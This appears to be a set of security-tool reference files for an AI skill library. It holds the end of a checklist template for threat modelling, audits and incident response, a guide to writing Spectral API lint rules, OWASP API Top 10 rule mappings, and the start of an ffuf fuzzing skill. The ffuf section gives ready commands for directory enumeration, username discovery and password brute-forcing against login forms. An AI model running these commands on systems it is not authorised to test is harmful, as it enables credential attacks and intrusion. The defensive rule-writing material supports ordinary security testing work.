[ ] 5. Apply STRIDE framework to each component:
- Spoofing threats
- Tampering threats
- Repudiation threats
- Information disclosure threats
- Denial of service threats
- Elevation of privilege threats
[ ] 6. Map threats to MITRE ATT&CK techniques
[ ] 7. Identify existing mitigations
[ ] 8. Document residual risks
[ ] 9. Recommend additional security controls
[ ] 10. Generate threat model document
Work through each step systematically. Check off completed items.
---
## Pattern 7: Compliance Validation Workflow
Use this pattern for compliance checks against security standards.
### Security Compliance Audit Workflow
**SOC 2 Controls Review**:
[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)
[ ] 2. Verify logical access controls implementation (CC6.1)
[ ] 3. Review authentication mechanisms (CC6.1)
[ ] 4. Verify encryption implementation (CC6.1, CC6.7)
[ ] 5. Review audit logging configuration (CC7.2)
[ ] 6. Verify security monitoring (CC7.2, CC7.3)
[ ] 7. Review incident response procedures (CC7.3, CC7.4)
[ ] 8. Verify backup and recovery processes (A1.2, A1.3)
**Evidence Collection**:
[ ] 9. Collect policy documents
[ ] 10. Collect configuration screenshots
[ ] 11. Collect audit logs
[ ] 12. Document control gaps
[ ] 13. Generate compliance report
---
## Pattern 8: Incident Response Workflow
Use this pattern for security incident handling.
### Security Incident Response Workflow
**Detection and Analysis**:
[ ] 1. Confirm security incident (rule out false positive)
[ ] 2. Determine incident severity (SEV1/2/3/4)
[ ] 3. Identify affected systems and data
[ ] 4. Preserve evidence (logs, memory dumps, network captures)
**Containment**:
[ ] 5. Isolate affected systems (network segmentation)
[ ] 6. Disable compromised accounts
[ ] 7. Block malicious indicators (IPs, domains, hashes)
[ ] 8. Implement temporary compensating controls
**Eradication**:
[ ] 9. Identify root cause
[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)
[ ] 11. Patch vulnerabilities exploited
[ ] 12. Reset compromised credentials
**Recovery**:
[ ] 13. Restore systems from clean backups (if needed)
[ ] 14. Re-enable systems with monitoring
[ ] 15. Verify system integrity
[ ] 16. Resume normal operations
**Post-Incident**:
[ ] 17. Document incident timeline
[ ] 18. Identify lessons learned
[ ] 19. Update security controls to prevent recurrence
[ ] 20. Update incident response procedures
[ ] 21. Communicate with stakeholders
---
## Usage Guidelines
### When to Use Workflow Checklists
**Use checklists for**:
- Complex multi-step operations
- Operations requiring specific order
- Security assessments and audits
- Incident response procedures
- Compliance validation tasks
**Don't use checklists for**:
- Simple single-step operations
- Highly dynamic exploratory work
- Operations that vary significantly each time
### Adapting This Template
1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file
2. **Customize steps** to match your specific security tool or process
3. **Add framework references** (OWASP, CWE, NIST) where applicable
4. **Include tool-specific commands** for automation
5. **Add decision points** where manual judgment is required
### Checklist Best Practices
- **Be specific**: "Run semgrep --config=auto ." not "Scan the code"
- **Include success criteria**: "Validation passes with 0 errors"
- **Reference standards**: Link to OWASP, CWE, NIST where relevant
- **Show progress**: Checkbox format helps track completion
- **Provide escape hatches**: "If validation fails, see troubleshooting.md"
### Integration with Feedback Loops
Combine checklists with validation scripts for maximum effectiveness:
1. Create checklist for the workflow
2. Provide validation script that checks quality
3. Include "run validator" step in checklist
4. Loop: Complete step → Validate → Fix issues → Re-validate
This pattern dramatically improves output quality through systematic validation.

View File

@@ -0,0 +1,553 @@
# Spectral Custom Rules Development Guide
This guide covers creating custom security rules for Spectral to enforce organization-specific API security standards.
## Table of Contents
- [Rule Structure](#rule-structure)
- [JSONPath Expressions](#jsonpath-expressions)
- [Built-in Functions](#built-in-functions)
- [Security Rule Examples](#security-rule-examples)
- [Testing Custom Rules](#testing-custom-rules)
- [Best Practices](#best-practices)
## Rule Structure
Every Spectral rule consists of:
```yaml
rules:
rule-name:
description: Human-readable description
severity: error|warn|info|hint
given: JSONPath expression targeting specific parts of spec
then:
- field: property to check (optional)
function: validation function
functionOptions: function-specific options
message: Error message shown when rule fails
```
### Severity Levels
- **error**: Critical security issues that must be fixed
- **warn**: Important security recommendations
- **info**: Best practices and suggestions
- **hint**: Style guide and documentation improvements
## JSONPath Expressions
### Basic Path Selection
```yaml
# Target all paths
given: $.paths[*]
# Target all GET operations
given: $.paths[*].get
# Target all HTTP methods
given: $.paths[*][get,post,put,patch,delete]
# Target security schemes
given: $.components.securitySchemes[*]
# Target all schemas
given: $.components.schemas[*]
```
### Advanced Filters
```yaml
# Filter by property value
given: $.paths[*][?(@.security)]
# Filter objects by type
given: $.components.schemas[?(@.type == 'object')]
# Filter parameters by location
given: $.paths[*][*].parameters[?(@.in == 'query')]
# Regular expression matching
given: $.paths[*][*].parameters[?(@.name =~ /^(id|.*_id)$/i)]
# Nested property access
given: $.paths[*][*].responses[?(@property >= 400)]
```
## Built-in Functions
### truthy / falsy
Check if field exists or doesn't exist:
```yaml
# Require field to exist
then:
- field: security
function: truthy
# Require field to not exist
then:
- field: additionalProperties
function: falsy
```
### pattern
Match string against regex pattern:
```yaml
# Match HTTPS URLs
then:
function: pattern
functionOptions:
match: "^https://"
# Ensure no sensitive terms
then:
function: pattern
functionOptions:
notMatch: "(password|secret|api[_-]?key)"
```
### enumeration
Restrict to specific values:
```yaml
# Require specific auth types
then:
field: type
function: enumeration
functionOptions:
values: [apiKey, oauth2, openIdConnect]
```
### length
Validate string/array length:
```yaml
# Minimum description length
then:
field: description
function: length
functionOptions:
min: 10
max: 500
```
### schema
Validate against JSON Schema:
```yaml
# Require specific object structure
then:
function: schema
functionOptions:
schema:
type: object
required: [error, message]
properties:
error:
type: string
message:
type: string
```
### alphabetical
Ensure alphabetical ordering:
```yaml
# Require alphabetically sorted tags
then:
field: tags
function: alphabetical
```
## Security Rule Examples
### Prevent PII in URL Parameters
```yaml
no-pii-in-query-params:
description: Query parameters must not contain PII
severity: error
given: $.paths[*][*].parameters[?(@.in == 'query')].name
then:
function: pattern
functionOptions:
notMatch: "(?i)(ssn|social.?security|credit.?card|password|passport|driver.?license|tax.?id|national.?id)"
message: "Query parameter names suggest PII - use request body instead"
```
### Require API Key for Authentication
```yaml
require-api-key-security:
description: APIs must use API key authentication
severity: error
given: $.components.securitySchemes
then:
function: schema
functionOptions:
schema:
type: object
minProperties: 1
patternProperties:
".*":
anyOf:
- properties:
type:
const: apiKey
- properties:
type:
const: oauth2
- properties:
type:
const: openIdConnect
message: "API must define apiKey, OAuth2, or OpenID Connect security"
```
### Enforce Rate Limiting Headers
```yaml
rate-limit-headers-present:
description: Responses should include rate limit headers
severity: warn
given: $.paths[*][get,post,put,patch,delete].responses[?(@property == '200' || @property == '201')].headers
then:
function: schema
functionOptions:
schema:
type: object
anyOf:
- required: [X-RateLimit-Limit]
- required: [X-Rate-Limit-Limit]
message: "Include rate limit headers (X-RateLimit-Limit, X-RateLimit-Remaining) in success responses"
```
### Detect Missing Authorization for Sensitive Operations
```yaml
sensitive-operations-require-security:
description: Sensitive operations must have security requirements
severity: error
given: $.paths[*][post,put,patch,delete]
then:
- field: security
function: truthy
message: "Write operations must have security requirements defined"
```
### Prevent Verbose Error Messages
```yaml
no-verbose-error-responses:
description: Error responses should not expose internal details
severity: warn
given: $.paths[*][*].responses[?(@property >= 500)].content.application/json.schema.properties
then:
function: schema
functionOptions:
schema:
type: object
not:
anyOf:
- required: [stack_trace]
- required: [stackTrace]
- required: [debug_info]
- required: [internal_message]
message: "5xx error responses should not expose stack traces or internal details"
```
### Require Audit Fields in Schemas
```yaml
require-audit-fields:
description: Data models should include audit fields
severity: info
given: $.components.schemas[?(@.type == 'object' && @.properties)]
then:
function: schema
functionOptions:
schema:
type: object
properties:
properties:
type: object
anyOf:
- required: [created_at, updated_at]
- required: [createdAt, updatedAt]
message: "Consider adding audit fields (created_at, updated_at) to data models"
```
### Detect Insecure Content Types
```yaml
no-insecure-content-types:
description: Avoid insecure content types
severity: warn
given: $.paths[*][*].requestBody.content
then:
function: schema
functionOptions:
schema:
type: object
not:
required: [text/html, text/xml, application/x-www-form-urlencoded]
message: "Prefer application/json over HTML, XML, or form-encoded content types"
```
### Validate JWT Security Configuration
```yaml
jwt-proper-configuration:
description: JWT bearer authentication should be properly configured
severity: error
given: $.components.securitySchemes[?(@.type == 'http' && @.scheme == 'bearer')]
then:
- field: bearerFormat
function: pattern
functionOptions:
match: "^JWT$"
message: "Bearer authentication should specify 'JWT' as bearerFormat"
```
### Require CORS Documentation
```yaml
cors-options-documented:
description: CORS preflight endpoints should be documented
severity: warn
given: $.paths[*]
then:
function: schema
functionOptions:
schema:
type: object
if:
properties:
get:
type: object
then:
properties:
options:
type: object
required: [responses]
message: "Document OPTIONS method for CORS preflight requests"
```
### Prevent Numeric IDs in URLs
```yaml
prefer-uuid-over-numeric-ids:
description: Use UUIDs instead of numeric IDs to prevent enumeration
severity: info
given: $.paths.*~
then:
function: pattern
functionOptions:
notMatch: "\\{id\\}|\\{.*_id\\}"
message: "Consider using UUIDs instead of numeric IDs to prevent enumeration attacks"
```
## Testing Custom Rules
### Create Test Specifications
```yaml
# test-specs/valid-auth.yaml
openapi: 3.0.0
info:
title: Valid API
version: 1.0.0
components:
securitySchemes:
apiKey:
type: apiKey
in: header
name: X-API-Key
security:
- apiKey: []
```
```yaml
# test-specs/invalid-auth.yaml
openapi: 3.0.0
info:
title: Invalid API
version: 1.0.0
components:
securitySchemes:
basicAuth:
type: http
scheme: basic
security:
- basicAuth: []
```
### Test Rules
```bash
# Test custom ruleset
spectral lint test-specs/valid-auth.yaml --ruleset .spectral-custom.yaml
# Expected: No errors
spectral lint test-specs/invalid-auth.yaml --ruleset .spectral-custom.yaml
# Expected: Error about HTTP Basic auth
```
### Automated Testing Script
```bash
#!/bin/bash
# test-rules.sh - Test custom Spectral rules
RULESET=".spectral-custom.yaml"
TEST_DIR="test-specs"
PASS=0
FAIL=0
for spec in "$TEST_DIR"/*.yaml; do
echo "Testing: $spec"
if spectral lint "$spec" --ruleset "$RULESET" > /dev/null 2>&1; then
if [[ "$spec" == *"valid"* ]]; then
echo " ✓ PASS (correctly validated)"
((PASS++))
else
echo " ✗ FAIL (should have detected issues)"
((FAIL++))
fi
else
if [[ "$spec" == *"invalid"* ]]; then
echo " ✓ PASS (correctly detected issues)"
((PASS++))
else
echo " ✗ FAIL (false positive)"
((FAIL++))
fi
fi
done
echo ""
echo "Results: $PASS passed, $FAIL failed"
```
## Best Practices
### 1. Start with Built-in Rules
Extend existing rulesets instead of starting from scratch:
```yaml
extends: ["spectral:oas", "spectral:asyncapi"]
rules:
# Add custom rules here
custom-security-rule:
# ...
```
### 2. Use Descriptive Names
Rule names should clearly indicate what they check:
```yaml
# Good
no-pii-in-query-params:
require-https-servers:
jwt-bearer-format-required:
# Bad
check-params:
security-rule-1:
validate-auth:
```
### 3. Provide Actionable Messages
```yaml
# Good
message: "Query parameters must not contain PII (ssn, credit_card) - use request body instead"
# Bad
message: "Invalid parameter"
```
### 4. Choose Appropriate Severity
```yaml
# error - Must fix (security vulnerabilities)
severity: error
# warn - Should fix (security best practices)
severity: warn
# info - Consider fixing (recommendations)
severity: info
# hint - Nice to have (style guide)
severity: hint
```
### 5. Document Rule Rationale
```yaml
rules:
no-numeric-ids:
description: |
Use UUIDs instead of auto-incrementing numeric IDs in URLs to prevent
enumeration attacks where attackers can guess valid IDs sequentially.
This follows OWASP API Security best practices for API1:2023.
severity: warn
# ...
```
### 6. Use Rule Overrides for Exceptions
```yaml
# Allow specific paths to violate rules
overrides:
- files: ["**/internal-api.yaml"]
rules:
require-https-servers: off
- files: ["**/admin-api.yaml"]
rules:
no-http-basic-auth: warn # Downgrade to warning
```
### 7. Organize Rules by Category
```yaml
# .spectral.yaml - Main ruleset
extends:
- .spectral-auth.yaml # Authentication rules
- .spectral-authz.yaml # Authorization rules
- .spectral-data.yaml # Data protection rules
- .spectral-owasp.yaml # OWASP mappings
```
### 8. Version Control Your Rulesets
```bash
# Track ruleset evolution
git log -p .spectral.yaml
# Tag stable ruleset versions
git tag -a ruleset-v1.0 -m "Production-ready security ruleset"
```
## Additional Resources
- [Spectral Rulesets Documentation](https://docs.stoplight.io/docs/spectral/docs/getting-started/rulesets.md)
- [JSONPath Online Evaluator](https://jsonpath.com/)
- [Custom Functions Guide](./custom_functions.md)
- [OWASP API Security Mappings](./owasp_api_mappings.md)

View File

@@ -0,0 +1,472 @@
# OWASP API Security Top 10 2023 - Spectral Rule Mappings
This reference provides comprehensive Spectral rule mappings to OWASP API Security Top 10 2023, including custom rule examples for detecting each category of vulnerability.
## Table of Contents
- [API1:2023 - Broken Object Level Authorization](#api12023---broken-object-level-authorization)
- [API2:2023 - Broken Authentication](#api22023---broken-authentication)
- [API3:2023 - Broken Object Property Level Authorization](#api32023---broken-object-property-level-authorization)
- [API4:2023 - Unrestricted Resource Consumption](#api42023---unrestricted-resource-consumption)
- [API5:2023 - Broken Function Level Authorization](#api52023---broken-function-level-authorization)
- [API6:2023 - Unrestricted Access to Sensitive Business Flows](#api62023---unrestricted-access-to-sensitive-business-flows)
- [API7:2023 - Server Side Request Forgery](#api72023---server-side-request-forgery)
- [API8:2023 - Security Misconfiguration](#api82023---security-misconfiguration)
- [API9:2023 - Improper Inventory Management](#api92023---improper-inventory-management)
- [API10:2023 - Unsafe Consumption of APIs](#api102023---unsafe-consumption-of-apis)
---
## API1:2023 - Broken Object Level Authorization
**Description**: APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface Level Access Control issue. Object level authorization checks should be considered in every function that accesses a data source using an input from the user.
### Spectral Rules
```yaml
# .spectral-api1.yaml
rules:
# Require security on all operations
operation-security-defined:
description: All operations must have security requirements (OWASP API1)
severity: error
given: $.paths[*][get,post,put,patch,delete]
then:
- field: security
function: truthy
message: "Operations must define security requirements to prevent unauthorized object access (OWASP API1:2023)"
# Detect ID parameters without authorization checks
id-parameter-requires-security:
description: Operations with ID parameters must have security defined
severity: error
given: $.paths[*][*].parameters[?(@.name =~ /^(id|.*[_-]id)$/i)]
then:
function: falsy
message: "Path contains ID parameter - ensure operation has security requirements (OWASP API1:2023)"
# Require authorization scopes for CRUD operations
crud-requires-authorization-scope:
description: CRUD operations should specify authorization scopes
severity: warn
given: $.paths[*][get,post,put,patch,delete].security[*]
then:
function: schema
functionOptions:
schema:
type: object
minProperties: 1
message: "CRUD operations should specify authorization scopes (OWASP API1:2023)"
```
### Remediation
- Implement object-level authorization checks in API specification security requirements
- Define per-operation security schemes with appropriate scopes
- Document which user roles can access which objects
- Consider using OAuth 2.0 with fine-grained scopes
---
## API2:2023 - Broken Authentication
**Description**: Authentication mechanisms are often implemented incorrectly, allowing attackers to compromise authentication tokens or exploit implementation flaws to assume other users' identities.
### Spectral Rules
```yaml
# .spectral-api2.yaml
rules:
# Require security schemes definition
security-schemes-required:
description: API must define security schemes (OWASP API2)
severity: error
given: $.components
then:
- field: securitySchemes
function: truthy
message: "API must define security schemes to prevent authentication bypass (OWASP API2:2023)"
# Prohibit HTTP Basic authentication
no-http-basic-auth:
description: HTTP Basic auth is insecure for APIs
severity: error
given: $.components.securitySchemes[*]
then:
- field: scheme
function: pattern
functionOptions:
notMatch: "^basic$"
message: "HTTP Basic authentication transmits credentials in plain text (OWASP API2:2023)"
# Require bearer token format specification
bearer-format-required:
description: Bearer authentication should specify token format (JWT recommended)
severity: warn
given: $.components.securitySchemes[?(@.type == 'http' && @.scheme == 'bearer')]
then:
- field: bearerFormat
function: truthy
message: "Bearer authentication should specify token format, preferably JWT (OWASP API2:2023)"
# Require OAuth2 flow for authentication
oauth2-recommended:
description: OAuth2 provides secure authentication flows
severity: info
given: $.components.securitySchemes[*]
then:
- field: type
function: enumeration
functionOptions:
values: [oauth2, openIdConnect, http]
message: "Consider using OAuth2 or OpenID Connect for robust authentication (OWASP API2:2023)"
```
### Remediation
- Use OAuth 2.0 or OpenID Connect for authentication
- Implement JWT with proper expiration and signature validation
- Avoid HTTP Basic authentication for production APIs
- Document authentication flows and token refresh mechanisms
---
## API3:2023 - Broken Object Property Level Authorization
**Description**: This category combines API3:2019 Excessive Data Exposure and API6:2019 Mass Assignment, focusing on the root cause: the lack of or improper authorization validation at the object property level.
### Spectral Rules
```yaml
# .spectral-api3.yaml
rules:
# Prohibit additionalProperties for security
no-additional-properties:
description: Prevent mass assignment by disabling additionalProperties
severity: warn
given: $.components.schemas[*]
then:
- field: additionalProperties
function: falsy
message: "Set additionalProperties to false to prevent mass assignment vulnerabilities (OWASP API3:2023)"
# Require explicit property definitions
schema-properties-required:
description: Schemas should explicitly define all properties
severity: warn
given: $.components.schemas[?(@.type == 'object')]
then:
- field: properties
function: truthy
message: "Explicitly define all object properties to control data exposure (OWASP API3:2023)"
# Warn on write-only properties
detect-write-only-properties:
description: Document write-only properties to prevent data exposure
severity: info
given: $.components.schemas[*].properties[*]
then:
- field: writeOnly
function: truthy
message: "Ensure write-only properties are properly handled (OWASP API3:2023)"
# Require read-only for sensitive computed fields
computed-fields-read-only:
description: Computed fields should be marked as readOnly
severity: warn
given: $.components.schemas[*].properties[?(@.description =~ /calculated|computed|derived/i)]
then:
- field: readOnly
function: truthy
message: "Mark computed/calculated fields as readOnly (OWASP API3:2023)"
```
### Remediation
- Set `additionalProperties: false` in schemas to prevent mass assignment
- Use `readOnly` for properties that shouldn't be modified by clients
- Use `writeOnly` for sensitive input properties (passwords, tokens)
- Document which properties are accessible to which user roles
---
## API4:2023 - Unrestricted Resource Consumption
**Description**: Satisfying API requests requires resources such as network bandwidth, CPU, memory, and storage. Sometimes required resources are made available by service providers via API integrations, and paid for per request, such as sending emails/SMS/phone calls, biometrics validation, etc.
### Spectral Rules
```yaml
# .spectral-api4.yaml
rules:
# Require rate limit documentation
rate-limit-headers-documented:
description: API should document rate limiting headers
severity: warn
given: $.paths[*][*].responses[*].headers
then:
function: schema
functionOptions:
schema:
type: object
properties:
X-RateLimit-Limit:
type: object
X-RateLimit-Remaining:
type: object
message: "Document rate limiting headers (X-RateLimit-*) to communicate consumption limits (OWASP API4:2023)"
# Detect pagination parameters
pagination-required:
description: List operations should support pagination
severity: warn
given: $.paths[*].get.parameters
then:
function: schema
functionOptions:
schema:
type: array
contains:
anyOf:
- properties:
name:
const: limit
- properties:
name:
const: offset
message: "List operations should support pagination (limit/offset or cursor) to prevent resource exhaustion (OWASP API4:2023)"
# Maximum response size documentation
response-size-limits:
description: Document maximum response sizes
severity: info
given: $.paths[*][*].responses[*]
then:
- field: description
function: pattern
functionOptions:
match: "(maximum|max|limit).*(size|length|count)"
message: "Consider documenting maximum response sizes (OWASP API4:2023)"
```
### Remediation
- Implement rate limiting and document limits in API specification
- Use pagination for all list operations (limit/offset or cursor-based)
- Document maximum request/response sizes
- Implement request timeout and maximum execution time limits
---
## API8:2023 - Security Misconfiguration
**Description**: APIs and the systems supporting them typically contain complex configurations, meant to make the APIs more customizable. Software and DevOps engineers can miss these configurations, or don't follow security best practices when it comes to configuration, opening the door for different types of attacks.
### Spectral Rules
```yaml
# .spectral-api8.yaml
rules:
# Require HTTPS for all servers
servers-use-https:
description: All API servers must use HTTPS
severity: error
given: $.servers[*].url
then:
function: pattern
functionOptions:
match: "^https://"
message: "Server URLs must use HTTPS protocol for secure communication (OWASP API8:2023)"
# Detect example.com in server URLs
no-example-servers:
description: Replace example server URLs with actual endpoints
severity: error
given: $.servers[*].url
then:
function: pattern
functionOptions:
notMatch: "example\\.com"
message: "Replace example.com with actual server URL (OWASP API8:2023)"
# Require security headers documentation
security-headers-documented:
description: Document security headers in responses
severity: warn
given: $.paths[*][*].responses[*].headers
then:
function: schema
functionOptions:
schema:
type: object
anyOf:
- required: [X-Content-Type-Options]
- required: [X-Frame-Options]
- required: [Strict-Transport-Security]
message: "Document security headers (X-Content-Type-Options, X-Frame-Options, HSTS) in responses (OWASP API8:2023)"
# CORS configuration review
cors-documented:
description: CORS should be properly configured and documented
severity: info
given: $.paths[*].options
then:
- field: responses
function: truthy
message: "Ensure CORS is properly configured - review Access-Control-* headers (OWASP API8:2023)"
```
### Remediation
- Use HTTPS for all API endpoints
- Configure and document security headers (HSTS, X-Content-Type-Options, X-Frame-Options)
- Properly configure CORS with specific origins (avoid wildcard in production)
- Disable unnecessary HTTP methods
- Remove verbose error messages in production
---
## API9:2023 - Improper Inventory Management
**Description**: APIs tend to expose more endpoints than traditional web applications, making proper and updated documentation highly important. A proper inventory of hosts and deployed API versions also are important to mitigate issues such as deprecated API versions and exposed debug endpoints.
### Spectral Rules
```yaml
# .spectral-api9.yaml
rules:
# Require API version
api-version-required:
description: API specification must include version
severity: error
given: $.info
then:
- field: version
function: truthy
message: "API version must be specified for proper inventory management (OWASP API9:2023)"
# Version format validation
semantic-versioning:
description: Use semantic versioning for API versions
severity: warn
given: $.info.version
then:
function: pattern
functionOptions:
match: "^\\d+\\.\\d+\\.\\d+"
message: "Use semantic versioning (MAJOR.MINOR.PATCH) for API versions (OWASP API9:2023)"
# Require contact information
contact-info-required:
description: API must include contact information
severity: warn
given: $.info
then:
- field: contact
function: truthy
message: "Include contact information for API support and security issues (OWASP API9:2023)"
# Require terms of service or license
legal-info-required:
description: API should include legal information
severity: info
given: $.info
then:
- field: license
function: truthy
message: "Include license or terms of service for API usage (OWASP API9:2023)"
# Deprecation documentation
deprecated-endpoints-documented:
description: Deprecated endpoints must be clearly marked
severity: warn
given: $.paths[*][*][?(@.deprecated == true)]
then:
- field: description
function: pattern
functionOptions:
match: "(deprecate|migrate|alternative|replacement)"
message: "Document deprecation details and migration path (OWASP API9:2023)"
```
### Remediation
- Maintain up-to-date API specification with version information
- Use semantic versioning for API versions
- Document all endpoints, including internal and deprecated ones
- Include contact information for security issues
- Implement API inventory management and discovery tools
- Remove or properly secure debug/admin endpoints in production
---
## Complete OWASP Ruleset Example
```yaml
# .spectral-owasp-complete.yaml
extends: ["spectral:oas"]
rules:
# API1: Broken Object Level Authorization
operation-security-defined:
severity: error
message: "All operations must have security defined (OWASP API1:2023)"
# API2: Broken Authentication
no-http-basic-auth:
description: Prohibit HTTP Basic authentication
severity: error
given: $.components.securitySchemes[*]
then:
field: scheme
function: pattern
functionOptions:
notMatch: "^basic$"
message: "HTTP Basic auth is insecure (OWASP API2:2023)"
# API3: Broken Object Property Level Authorization
no-additional-properties:
description: Prevent mass assignment
severity: warn
given: $.components.schemas[?(@.type == 'object')]
then:
field: additionalProperties
function: falsy
message: "Set additionalProperties to false (OWASP API3:2023)"
# API4: Unrestricted Resource Consumption
pagination-for-lists:
description: List operations should support pagination
severity: warn
given: $.paths[*].get
then:
function: truthy
message: "Implement pagination for list operations (OWASP API4:2023)"
# API8: Security Misconfiguration
servers-use-https:
description: All servers must use HTTPS
severity: error
given: $.servers[*].url
then:
function: pattern
functionOptions:
match: "^https://"
message: "Server URLs must use HTTPS (OWASP API8:2023)"
# API9: Improper Inventory Management
api-version-required:
description: API must specify version
severity: error
given: $.info
then:
field: version
function: truthy
message: "API version is required (OWASP API9:2023)"
```
## Additional Resources
- [OWASP API Security Top 10 2023](https://owasp.org/API-Security/editions/2023/en/0x11-t10/)
- [Spectral Rulesets Documentation](https://docs.stoplight.io/docs/spectral/docs/getting-started/rulesets.md)
- [OpenAPI Security Best Practices](https://swagger.io/docs/specification/authentication/)

View File

@@ -0,0 +1,476 @@
---
name: dast-ffuf
description: >
Fast web fuzzer for DAST testing with directory enumeration, parameter fuzzing, and virtual host
discovery. Written in Go for high-performance HTTP fuzzing with extensive filtering capabilities.
Supports multiple fuzzing modes (clusterbomb, pitchfork, sniper) and recursive scanning. Use when:
(1) Discovering hidden directories, files, and endpoints on web applications, (2) Fuzzing GET and
POST parameters to identify injection vulnerabilities, (3) Enumerating virtual hosts and subdomains,
(4) Testing authentication endpoints with credential fuzzing, (5) Finding backup files and sensitive
data exposures, (6) Performing comprehensive web application reconnaissance.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [dast, fuzzing, web-fuzzer, directory-enumeration, parameter-fuzzing, vhost-discovery, ffuf, reconnaissance]
frameworks: [OWASP]
dependencies:
tools: [ffuf]
references:
- https://github.com/ffuf/ffuf
---
# ffuf - Fast Web Fuzzer
## Overview
ffuf is a fast web fuzzer written in Go designed for discovering hidden resources, testing parameters, and performing comprehensive web application reconnaissance. It uses the FUZZ keyword as a placeholder for wordlist entries and supports advanced filtering, multiple fuzzing modes, and recursive scanning for thorough security assessments.
## Installation
```bash
# Using Go
go install github.com/ffuf/ffuf/v2@latest
# Using package managers
# Debian/Ubuntu
apt install ffuf
# macOS
brew install ffuf
# Or download pre-compiled binary from GitHub releases
```
## Quick Start
Basic directory fuzzing:
```bash
# Directory discovery
ffuf -u https://example.com/FUZZ -w /usr/share/wordlists/dirb/common.txt
# File discovery with extension
ffuf -u https://example.com/FUZZ -w wordlist.txt -e .php,.html,.txt
# Virtual host discovery
ffuf -u https://example.com -H "Host: FUZZ.example.com" -w subdomains.txt
```
## Core Workflows
### Workflow 1: Directory and File Enumeration
For discovering hidden resources on web applications:
1. Start with common directory wordlist:
```bash
ffuf -u https://target.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/common.txt \
-mc 200,204,301,302,307,401,403 \
-o results.json
```
2. Review discovered directories (focus on 200, 403 status codes)
3. Enumerate files in discovered directories:
```bash
ffuf -u https://target.com/admin/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/raft-small-files.txt \
-e .php,.bak,.txt,.zip \
-mc all -fc 404
```
4. Use recursive mode for deep enumeration:
```bash
ffuf -u https://target.com/FUZZ \
-w wordlist.txt \
-recursion -recursion-depth 2 \
-e .php,.html \
-v
```
5. Document findings and test discovered endpoints
### Workflow 2: Parameter Fuzzing (GET/POST)
Progress:
[ ] 1. Identify target endpoint for parameter testing
[ ] 2. Fuzz GET parameter names to discover hidden parameters
[ ] 3. Fuzz parameter values for injection vulnerabilities
[ ] 4. Test POST parameters with JSON/form data
[ ] 5. Apply appropriate filters to reduce false positives
[ ] 6. Analyze responses for anomalies and vulnerabilities
[ ] 7. Validate findings manually
[ ] 8. Document vulnerable parameters and payloads
Work through each step systematically. Check off completed items.
**GET Parameter Name Fuzzing:**
```bash
ffuf -u https://target.com/api?FUZZ=test \
-w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt \
-fs 0 # Filter out empty responses
```
**GET Parameter Value Fuzzing:**
```bash
ffuf -u https://target.com/api?id=FUZZ \
-w payloads.txt \
-mc all
```
**POST Data Fuzzing:**
```bash
# Form data
ffuf -u https://target.com/login \
-X POST \
-d "username=admin&password=FUZZ" \
-w passwords.txt \
-H "Content-Type: application/x-www-form-urlencoded"
# JSON data
ffuf -u https://target.com/api/login \
-X POST \
-d '{"username":"admin","password":"FUZZ"}' \
-w passwords.txt \
-H "Content-Type: application/json"
```
### Workflow 3: Virtual Host and Subdomain Discovery
For identifying virtual hosts and subdomains:
1. Prepare subdomain wordlist (or use SecLists)
2. Run vhost fuzzing:
```bash
ffuf -u https://target.com \
-H "Host: FUZZ.target.com" \
-w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt \
-fs 0 # Filter by response size to identify valid vhosts
```
3. Filter results by comparing response sizes/words
4. Verify discovered vhosts manually
5. Enumerate directories on each vhost
6. Document vhost configurations and exposed services
### Workflow 4: Authentication Endpoint Fuzzing
For testing login forms and authentication mechanisms:
1. Identify authentication endpoint
2. Fuzz usernames:
```bash
ffuf -u https://target.com/login \
-X POST \
-d "username=FUZZ&password=test123" \
-w usernames.txt \
-H "Content-Type: application/x-www-form-urlencoded" \
-mr "Invalid password|Incorrect password" # Match responses indicating valid user
```
3. For identified users, fuzz passwords:
```bash
ffuf -u https://target.com/login \
-X POST \
-d "username=admin&password=FUZZ" \
-w /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000.txt \
-H "Content-Type: application/x-www-form-urlencoded" \
-fc 401,403 # Filter failed attempts
```
4. Use clusterbomb mode for combined username/password fuzzing:
```bash
ffuf -u https://target.com/login \
-X POST \
-d "username=FUZZ1&password=FUZZ2" \
-w usernames.txt:FUZZ1 \
-w passwords.txt:FUZZ2 \
-mode clusterbomb
```
### Workflow 5: Backup and Sensitive File Discovery
For finding exposed backup files and sensitive data:
1. Create wordlist of common backup patterns
2. Fuzz for backup files:
```bash
ffuf -u https://target.com/FUZZ \
-w backup-files.txt \
-e .bak,.backup,.old,.zip,.tar.gz,.sql,.7z \
-mc 200 \
-o backup-files.json
```
3. Test common sensitive file locations:
```bash
ffuf -u https://target.com/FUZZ \
-w /usr/share/seclists/Discovery/Web-Content/sensitive-files.txt \
-mc 200,403
```
4. Download and analyze discovered files
5. Report findings with severity classification
## Fuzzing Modes
ffuf supports multiple fuzzing modes for different attack scenarios:
**Clusterbomb Mode** - Cartesian product of all wordlists (default):
```bash
ffuf -u https://target.com/FUZZ1/FUZZ2 \
-w dirs.txt:FUZZ1 \
-w files.txt:FUZZ2 \
-mode clusterbomb
```
Tests every combination: dir1/file1, dir1/file2, dir2/file1, dir2/file2
**Pitchfork Mode** - Parallel iteration of wordlists:
```bash
ffuf -u https://target.com/login \
-X POST \
-d "username=FUZZ1&password=FUZZ2" \
-w users.txt:FUZZ1 \
-w passwords.txt:FUZZ2 \
-mode pitchfork
```
Tests pairs: user1/pass1, user2/pass2 (stops at shortest wordlist)
**Sniper Mode** - One wordlist, multiple positions:
```bash
ffuf -u https://target.com/FUZZ \
-w wordlist.txt \
-mode sniper
```
Standard single-wordlist fuzzing.
## Filtering and Matching
Effective filtering is crucial for reducing noise:
**Match Filters** (only show matching):
- `-mc 200,301` - Match HTTP status codes
- `-ms 1234` - Match response size
- `-mw 100` - Match word count
- `-ml 50` - Match line count
- `-mr "success|admin"` - Match regex pattern in response
**Filter Options** (exclude matching):
- `-fc 404,403` - Filter status codes
- `-fs 0,1234` - Filter response sizes
- `-fw 0` - Filter word count
- `-fl 0` - Filter line count
- `-fr "error|not found"` - Filter regex pattern
